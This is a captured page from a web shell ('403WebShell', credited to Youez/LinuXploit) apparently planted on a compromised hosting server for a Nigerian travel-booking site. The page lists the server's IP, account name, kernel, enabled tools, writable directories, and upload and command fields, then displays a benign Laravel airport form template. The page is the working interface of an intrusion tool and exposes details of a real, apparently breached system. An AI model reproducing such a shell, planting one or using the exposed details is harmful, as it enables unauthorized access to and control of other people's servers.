Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.119.135.231
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/book24.ng/modules/Flight/Views/admin/airport/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/book24.ng/modules/Flight/Views/admin/airport/form.blade.php
<div class="form-group">
    <label>{{__("Name")}}</label>
    <input type="text" value="{{$row->name??''}}" placeholder="{{__("Name")}}" name="name" required class="form-control">
</div>
<div class="form-group">
    <label>{{__("Code")}}</label>
    <input type="text" value="{{$row->code??''}}" placeholder="{{__("IATA Code")}}" name="code" required class="form-control">
</div>
<div class="form-group">
    <label>{{__("Address")}}</label>
    <input type="text" value="{{$row->address??''}}" placeholder="{{__("Address")}}" name="address" class="form-control">
</div>
<div class="form-group">
    <label>{{__("Location")}}</label>
    <select name="location_id" class="form-control">
        <option value="">{{__("-- Please Select --")}}</option>
        <?php
        $traverse = function ($array, $prefix = '') use (&$traverse, $row) {
            foreach ($array as $value) {
                if ($value->id == $row->id) {
                    continue;
                }
                $selected = '';
                if ($row->location_id == $value->id)
                    $selected = 'selected';
                printf("<option value='%s' %s>%s</option>", $value->id, $selected, $prefix . ' ' . $value->name);
                $traverse($value->children, $prefix . '-');
            }
        };
        $traverse($locations);
        ?>
    </select>
</div>
<div class="form-group">
    <label>{{__("Status")}}</label>
    <select class="form-control" name="status">
        <option value="publish">{{__('Publish')}}</option>
        <option value="draft" @if(old('draft',$row->status) == 'draft') selected @endif>{{__("Draft")}}</option>
    </select>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit